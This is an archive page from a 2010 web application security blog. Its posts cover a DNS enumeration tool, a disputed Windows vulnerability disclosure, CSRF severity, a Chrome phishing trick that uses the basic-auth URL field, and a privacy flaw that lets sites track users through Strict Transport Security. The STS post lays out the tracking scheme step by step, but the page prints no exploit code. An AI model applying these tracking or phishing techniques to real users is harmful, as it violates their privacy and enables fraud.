Paid Advertising
web application security lab

Archive for the 'Webappsec' Category

Fierce 2.0 To Be Released

Thursday, June 10th, 2010

A few years back I wrote a tool to do DNS enumeration. The point of it was that it is incredibly difficult to do an accurate penetration test against a target when you don’t know what to attack. The only way to know that is to find all the machines associated with that domain/customer or whatever. After a weekend or so of coding I came up with a functional, albeit crappy Perl program that did just that. A few people took note, a lot of people called me out for my crappy programming (rightfully) and ultimately it sat nearly stagnant for a few years. That is until I met Jabra.

Jabra (who works for Rapid7) is a bad ass Perl developer, at least compared to yours truly. He completely re-wrote Fierce, taking in my wish-list and a whole new set of features he wanted, like XML support to quickly integrate with nmap and all kinds of other stuff. Hopefully sometime next week we’ll have a released version. In the meantime please go and check out the beta of Fierce 2.0. Feedback is welcome!

Windows Help Centre Vuln

Thursday, June 10th, 2010

Updated: clarified some points of contention.

Early this morning Google’s Tavis Ormandy published a vulnerability in the hcp protocol handler. It allows the attacker to run arbitrary commands as the user. In practice it created a lot of alerts and warnings for me - but the XP install I was using is somewhat locked down. So I’m not sure how practical this attack would be over any other attack that causes an alert, as the article mentions. Later his reports says it works around the alerts (I couldn’t reproduce that, but that was his intention). Either way, though, this is some pretty amazing research. However, there are some odd things about this that really struck me the wrong way.

Google has been the loudest proponent for responsible disclosure in the past. But if you look at the dates in his post, he says he reported it to Microsoft on the 5th of June (a Saturday), who responded the same day. He sent the advisory early in the morning today the 10th of June - meaning Google gave Microsoft less than 5 days to fix it to respond to his demand to have it fixed in 60 days. Even Mozilla backed down from 10 day turn around, and they’re only running a single software suite. How is that possibly reasonable to expect a company like MS to turn around a patch in 4-5 days and then get so upset that then you must go full disclosure? (Incorrectly stated) And it’s not like Tavis was acting on his own - he credits other security researchers inside of Google for their help lcamtuf who works at Google. So apparently it’s okay for Google Google’s employees to go full disclosure, but not for other researchers. The hypocrisy is amazing.

See, here’s the big problem. Either you are all about full disclosure (which is happening less and less these days), you use it only when you know the company won’t react otherwise or has all kinds of other hinky things they do behind your back (the same reason I advocate full disclosure against Google), or you use responsible disclosure. Google says it adheres to responsible disclosure, but at the same time they give Microsoft 5 days to fix their 0day agree to a 60 day patch cycle for exploit code that Google’s researchers themselves created! From Google’s own website:

This process of notifying a vendor before publicly releasing information is an industry standard best practice known as responsible disclosure. Responsible disclosure is important to the ecology of the Internet. It allows companies like Google to better protect our users by fixing vulnerabilities and resolving security concerns before they are brought to the attention of the bad guys. We strongly encourage anyone who is interested in researching and reporting security issues to observe the simple courtesies and protocols of responsible disclosure. Our Security team follows the same procedure when we discover and report security vulnerabilities to other companies.

… except when you don’t. Then Tavis puts a patch up on a domain that, no offense to Tavis, is more sketchy sounding than a lot of malware sites out there ( Do you really expect a billion XP users to download and run that? (Non sequitur) There is evidence that it doesn’t even work in some cases, but it does appear to work against the one PoC Tavis put up in the test I ran. I don’t know, the whole thing just rubbed me the wrong way. But at least now no one has to pretend to do responsible disclosure with Google just because it’s the right thing to do - they don’t use it themselves. Even when MS finds a vuln in Google they do so responsibly. I don’t mean to say anything bad about Tavis, because he’s probably a good guy, with a lot of skill. But let’s stop pretending Google’s team is chivalrous, shall we? Let’s see what Google does when one of their own breaks their stated policies, whether the researcher is working in their own time or not.

Just Another Day at

Friday, April 16th, 2010

I don’t think I need to introduce this email, I think it speaks for itself:

Valued Road Runner Business Class Customer,

This email is in regards to the Time Warner (Road Runner) account for the following location


The Road Runner Abuse Control Department has received a complaint of network abuse originating from a computer connected to your cable modem. We recognize that most Internet abuse complaints are the result of computers infected with viruses/worms or compromised by a trojan horse( a.k.a. “trojan” for short). Trojans allow malicious third parties to gain access to your system(s) for the purpose of using your Internet connection to intentionally commit the abuse in question. The abuse commonly comes in the form of either unsolicited email ( a.k.a. “spam”) or port scanning (connection attempts to other systems across the Internet for the purpose of finding vulnerable systems to infect or exploit). However, if not addressed in a timely manner, your machine(s) potentially may be used for other more illegal activities

A portion of the complaint we have received is copied below for your review:

|date |id |virusname |ip
|domain |Url|
|2010-04-14 02:20:04 CEST |514019 |unknown_html_RFI
| | |


If your recognize this activity and it was intentionally sent, you may be in violation of our Acceptable Use Policy (AUP) and it’s important that you contact us immediately to discuss. If you do not recognize this, you likely have a compromised or infected system connected to your cable modem and will need to take action to clean and secure all Internet connected-computers as soon as possible. We take these complaints very seriously and further substantiated complaints could, at some point, require us to disable your cable modem in an effort to protect the integrity of our network. We obviously have no desire to interfere with your ability to conduct business and would prefer to not take such action, so please pursue whatever measures are necessary (up to and including the formatting of hard drives and/or assistance from a third party IT professional) to correct the problem with due urgency.

If it would be helpful, Road Runner does offer free anti-virus and firewall software for commercial use. You will need your Road Runner account information to register the software, so you may need to contact your local Time Warner office for assistance. For more information, please visit the following link:

Additionally, we have a suggested course of action on our Website, but please be aware that it is intended for use by residential customers to clean a single computer and may not be feasible for use in a commercial environment. Moreover, some of the suggested software is licensed for personal use only. We cannot accept responsibility for compliance with software licenses, so please be aware of rules and restrictions related to the installation and use of any applications suggested. If interested in this course of action, please visit the following link:

http://www.rrsecurity-abuse .com

If you have a network connected via a router, you may be able to view the router logs, looking for either a large amount of email activity or the port scanning activity specified above. This may indicate which computer is the offending system and thus help you simplify the solution.

The corrective action taken is entirely your responsibility. We are merely making contact to alert you to the problem in an effort to both protect our network and enforce our policies. But we ask that you do take corrective action as soon as possible and contact us to advise, preferably by simply replying to this email. Also feel free to contact us with any questions you have regarding this issue.

Thank You,
Time Warner Cable (Road Runner) Abuse Control, Regional Office

I didn’t realize 2 lines of completely benign JavaScript that can be included on websites is now considered abusive. I can’t wait until someone ads Google Adsense as unknown_html_RFI. If you know who submitted this, please smack them upside the head for me and then sit them down and help them find a job that doesn’t require a keyboard. kthanksbye.

CSRF Isn’t A Big Deal - Duh!

Wednesday, April 14th, 2010

Did you hear the news? CSRF isn’t a big deal. I just got the memo too! There were a few posts pointing me to an article on the fact that CSRF isn’t that big of a deal. Fear not, I am here to lay the smack down on this foolishness. To be fair, I have no idea who this guy is, and maybe he’s great at other forms of hacking - web applications just don’t happen to be his strong point. Let’s dissect the argument, just to be clear:

Even with some of the best commercial Web vulnerability scanners, it’s very rare that I find cross-site request forgery (CSRF). That doesn’t mean it’s not there. Given the complexity of CSRF, it’s actually pretty difficult to find.

Huh? It’s difficult to find with a scanner so therefore it’s difficult to find period? Noooo… almost every single form on the internet is vulnerable to it unless it’s using a nonce. Just because scanners have a tough time dealing with it doesn’t mean it’s hard for a human to find. If you set down your scanner and do a manual pentest once in a while you’ll find that nearly every site is vulnerable to it in multiple places (.NET with encrypted ViewStates are the only sites that natively don’t have this problem regularly).

The good news is it’s even more difficult to exploit CSRF which essentially takes advantage of the trust a Web application has for a user.

What the?! Difficult to exploit? If writing HTML and/or JavaScript is difficult, sure. However, if you have even the slightest idea of how to create a form and a one liner JavaScript to submit it, or even worse a single image tag in a lot of cases, it’s not difficult. It’s not even mildly challenging. The only hard part is getting the user to click on that page with the payload, but even that should still be kitten play in almost all cases through web-boards, spear phishing and the like. Getting people to click on links is insanely easy. Maybe I’m not getting the difficult part. Also, that is a terrible way to think about CSRF - it’s not always about trust, it’s just about getting another user to commit an action on your behalf. Trust is only involved in some instances of CSRF - there are many many examples that have nothing to do with user credentials.

So, based on what I’m seeing in my work I don’t think CSRF is as big of a deal - or perhaps I should say as top of a priority.

No, not top priority compared to something like SQL injection or command injection or something. But yes, it’s very much a big deal. Last week I did an assessment where one of the CSRF attacks would allow me to create a new admin user in the system. A huge percentage of the fraud on the Internet (TOS fraud, not actual hacking) is related to CSRF abuse (click fraud, affiliate fraud, etc…). We’re talking about hundreds of millions of dollars lost to a single exploit and only in those two variants. Like lots of exploits it totally depends on the problem at hand. Sorry, folks, CSRF is not getting downgraded because a piece of software can’t find the issue for you.

Chrome Phishing

Wednesday, April 14th, 2010

Securosis did a little writeup on how Google’s switching to Chrome as a secure alternative to anything else is rather short-sighted following an interview with Eric Schmidt. I think some people think I’m just speculating when I talk about how browsers tend to make the same mistakes over and over again without learning the lessons of their predecessors. No, that’s not idle speculation. Eric Schmidt said that they want to be held accountable for how much more secure their website and web technologies are. Alright… if you say so, Eric.

Reaching into my grab bag of Chrome issues, let me pull out the oldest lamest one I can just as a proof of concept:

There is a long ago patched bug that was used by phishers many years back that allowed them to create targeted phishing links that could fool the eye. By putting the name of the site in question in the basic authentication field, they could make people think they were clicking on something they weren’t. Mind you, this has been patched for years in Firefox. Chrome? Not so much. The following was tested in Chrome on Vista.

The reason why modern “new” browsers aren’t as good for security is precisely because of two reasons 1) they haven’t figured their security model out completely and 2) they don’t go back and read about all the same hard learned lessons of their kin and build in those lessons learned. Basing your entire security model on an unproven browser that JUST had a dozen holes uncovered a few days ago is foolhardy at best. So, yes, Eric - I’m sorry to say, you are building your new security posture on a house of cards, and everyone who uses Google, Chinese dissidents or otherwise, is at the mercy of that decision.

Chrome Fixes STS Privacy Issue

Tuesday, April 13th, 2010

I’m always interested in finding ways to leak privacy information out through browsers. For those who aren’t aware of it, there’s a new technology called “Strict Transport Security” or STS for short that pins a browser into using SSL/TLS for all further connections with the site in question. The goal of the tool is to reduce the risk of tools like SSLStrip that downgrade you to using HTTP instead of HTTPS. However, there was a somewhat bad privacy issue that was created as a result of it:

Imagine a scenario where you have one website that a user is interacting with (say an evil advertising empire intent on tracking people for marketing purposes).

On that SSL/TLS enabled website there are a series of iframes. Each iframe leads to different HTTP (not HTTPS servers). The first iframe (call it iframe00) is the “check” to see if the user has been to the site before. It automatically redirects the user to the HTTPS site via 301 redirect. The fact that the user hit the HTTP site at all means they haven’t been there before which brings us to the first use case:

Use case 1) If the user has not been to the evil website before (which can be found out because the user will hit the HTTP version of frame00 before being redirected to the STS enabled SSL/TLS version of that subdomain), a series of iframes will selectively turn STS on and off on each subdomain. Those subdomains will essentially provide one bit of information. Collectively that maps to a user profile in the database. For instance frame01 = STS, frame02 = HTTP, frame03 = STS, frame04 = STS … could map to binary 1011 = decimal 11 or the 11th user to visit the site. The number of iframes required is based on the total number of users that the site believed it would need to track over it’s lifetime or 33 iframes total (which would enable enough bits for the ~1.7bn internet users).

Use case 2) If the user has been to the site before they will not hit the HTTP site on frame00 (the “check” website) and they instead are immediately sent to the STS site, the evil website can begin to calculate who that user corresponds to. By setting every frame to the HTTP sites (not STS enabled SSL/TLS sites) and seeing which ones instead go to the HTTPS site, the evil site can map those bits back to the corresponding user that the site has seen before.

This is one of those unfortunate examples where it’s a good idea that introduces another security flaw. The fix isn’t great though - as it basically helps reduce the effectiveness of STS in the first place, by making it easier for the user to clean out. The whole point of STS is to pin the browser to a secure connection. So either that’s important to do, or it isn’t. If it isn’t, STS shouldn’t exist. If it is, then it shouldn’t be cleaned. Either way, I don’t think STS is going to provide a lot of value without some more thinking. But for now, it’s a good chance for companies to play with a new way of securing their site from man in the middle attacks. Firefox is planning on implementing this soon as well. Overall, I was pretty happy with how Google handled the bug, and fixed it, along with the dozen or so other bugs that were reported to them during the bug hunting contest. Hopefully, Google will continue increase their diligence around privacy issues in their products in the future.

AT&T UTMS JS Injection

Monday, April 12th, 2010

This isn’t exactly an exploit, but I’m sure after reading it, some people will feel like it is, or at minimum it might make people feel uncomfortable. It appears when users connect through AT&T UTMS wireless cards, the system man-in-the-middle’s the connection, and not only does it downgrade the image quality for performance reasons but it also injects a piece of JavaScript located at (not live on the Internet). If you’re anything like me and you see a piece of JS installed in your website that you know doesn’t have any JS on it at all, you’re thinking you’re owned at this point. Alas, you probably are owned, but it’s in an effort to save your bandwidth. You can download a zipped copy of this JavaScript file here.

The real questions are when and how this page gets cached, and who owns when it’s not being MITM’d (when you switch from UTMS to another network), and on and on. Incidentally, I tried to do directory transversal and go to to see what else might be on that page and it banned me from going there and to the JavaScript file for the rest of the session. Why? Probably to stop guys like me from hacking whatever server that is and MITMing everyone on AT&T’s UTMS network. Clearly reducing the size of the page, is good for them, and is good for some percentage of users who don’t care about the potential issues here. And for the rest of us, we’ll continue to tunnel our traffic so we can avoid AT&T’s MITM craziness.

Update: a few people have sent me a link that this also is happening on other networks as well.

Mavituna Security’s Netsparker Community Edition

Friday, April 9th, 2010

For those pen-testers out there, you may be interested in this. Mavituna security recently announced a free “community version” of their scanner, Netsparker. For those who haven’t played with it yet, it’s pretty slick in one very important way, for manual penetration testers. If it can find something like blind SQL injection or command injection of some sort it will allow you to essentially use the tool itself as a pivoting tool to begin performing assessments after that initial compromise is complete. Pretty cool idea, and if you check the website, Ferruh has put up some good movies showing how powerful that can be. This would be one very good difference between a vulnerability assessment and a penetration test.

The community version can be found here. It’s definitely a great tool for those who want to perform assessments on the cheap or want to try a tool before they buy. Other scanners have tried this route in the past (E.g. Acunetix), and I think it’s a great way to show off the goods. I’m sure he and his team would appreciate feedback.

MalaRIA Malicious RIA Proxy

Tuesday, April 6th, 2010

I got an email from Erlend Oftedal about a new tool he’s created called MalaRIA. The tool uses weak crossdomain.xml and clientaccesspolicy.xml (so both Flash and Silverlight) to allow a piece of code that resides on his server to use the client’s machine as a proxy to read information off of other websites that are protected in other ways. So think of it like an RIA version of BeEF.

You can read his blog post here or if you’re the visual type you can check out his movie here. We often talk about why poorly written crossdomain.xml files are dangerous, but I think this puts the last nail in that coffin. Yes, it’s dangerous. For real. Incidentally there is no reason you couldn’t deliver a MalaRIA payload over BeEF as well, if you wanted the best of both worlds. Nice job by Erlend!

Update: code available here.

Mozilla Plans Fix for CSS History Hack

Wednesday, March 31st, 2010

It’s with mixed emotion that I write this. The CSS history hack is soon going to close. If you look at the original Bugzilla thread this is something that Mozilla had marked as a P1 bug since 2002. You heard me right, this P1 bug has been open for 8 years. And here we are, on the cusp of an actual fix. Why do I have mixed emotion? You’d think I’d be doing back flips since we’re finally going to see an end to this. Well… the problem is we won’t.

The first problem is that this is only Mozilla - so we’re talking about a minority of all users. Secondly, of all the hacks we have at our disposal, this is just an information leakage. In fact, I recently wrote a letter, as did a handful of other security researchers, and I only marked this as third on the importance to fix out of five. Worse yet, it doesn’t actually fix the problem. There are still other timing based attacks to get the same information. So while it’s great that we’re finally fixing an 8 year old P1 bug, it’s not like the problem is gone, we’ve just removed one vector. The bad guys still have others at their disposal.

I know a lot of people will think I’m being a little harsh, but let’s take a real exploit here for a second - CSRF. You’re going to tell me, “Browsers can’t fix CSRF - that’s up to websites to fix. They should use nonces on every page.” Sure… but before this fix came out for Mozilla, they were saying the same thing about the CSS history hack - the browsers aren’t at fault - the spec is:

This might be a reasonable stopgap to check in just in case some big flap comes up, although since MS is also vulnerable, and it’s really the spec’s fault we might not come under great pressure to fix this immediately.

Yes, the spec is at fault, and yes, websites could protect themselves from the CSS history hack by also using nonces with a large enough keyspace so that computing a valid link is computationally unfeasible. Funny how both these exploits have the same fixes a) create nonces on every page on the Internet that has any sensitivity or b) fix the browser. That quote is pretty telling - without pressure from the community, there’s no way we’re going to get any of this stuff fixed because the browsers will default to whatever the poorly written spec says to do. So let’s not pat ourselves on the back too much here - it seems with every hole fixed there’s two more that pop up and even when identified they take way too long to fix. I don’t mean to harp on the Mozilla guys too much - at least they have a fix in the works. But that doesn’t change the fact that we appear to be playing a very losing game of whack a mole.